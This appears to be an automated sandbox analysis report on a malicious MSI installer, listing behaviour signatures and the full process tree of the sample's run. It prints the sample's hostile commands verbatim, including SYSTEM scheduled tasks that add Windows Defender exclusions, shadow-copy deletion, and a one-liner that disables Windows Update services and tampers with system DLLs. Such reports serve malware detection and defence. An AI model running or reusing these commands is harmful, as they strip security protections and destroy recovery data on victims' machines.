Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    04/08/2026, 06:32

General

  • Target
    setup_n0c017.msi
  • Size 9.2MB
  • Sample260804-ham55sed86
  • SHA256 9a653daf95c5875771e7b145158a81c58c7db2ec07700a12cca013055ab8faa6
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 3 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 30 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c017.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2736
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4584
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 88FD2B4291B491EF20A39A5D1FF4DF26 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4420
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4468
  • C:\Users\Public\7HxuIV\I9duBk.exe
    C:\Users\Public\7HxuIV\I9duBk.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2864
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\7HxuIV\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4568
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\7HxuIV\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4552
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:2684
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:860
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4760
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4444
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3020
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:772
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:4156
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3936
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:2636
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1628
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4540
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3208
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3100
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1668
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:804
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3168
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:3996
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:3924
                        • C:\Program Files (x86)\T5tunD\T5tunD.exe
                          "C:\Program Files (x86)\T5tunD\T5tunD.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:780
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4308
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\T5tunD" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:596
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\T5tunD" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3896
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2972
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4880
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\T5tunD\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4732
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\T5tunD\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:5116
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4404
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1628
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:712
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:3888
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1272
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                  PID:176
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3064
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure wuauserv reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4624
                              • C:\Windows\SysWOW64\net.exe
                                net stop UsoSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4740
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop UsoSvc
                                  5⤵
                                    PID:3100
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config UsoSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2112
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure UsoSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:420
                                • C:\Windows\SysWOW64\net.exe
                                  net stop uhssvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3824
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop uhssvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3144
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config uhssvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3576
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure uhssvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4924
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WaaSMedicSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2040
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5040
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WaaSMedicSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:1652
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:1056
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3940
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4992
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:4880
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4792
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\wuaueng.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:860
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1412
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3936
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:1116
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                  4⤵
                                    PID:1944
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4004
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3700
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    PID:3836
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c echo.>c:\xxxx.ini
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:3292
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:4824
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:4876
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4200
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1364
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\T5tunD" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:1472
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\T5tunD" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:3748
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\T5tunD" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:2748
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\T5tunD" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2076
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1656
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1056
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                      PID:2252
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1668
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\T5tunD.exe" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4228
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\T5tunD\T5tunD.exe" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:4552
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\T5tunD.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:2056
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\T5tunD\T5tunD.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:712
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\T5tunD.exe" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:2752
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\T5tunD\T5tunD.exe" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:4072
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\image.png" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:1424
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\T5tunD\image.png" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:544
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4620
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      4⤵
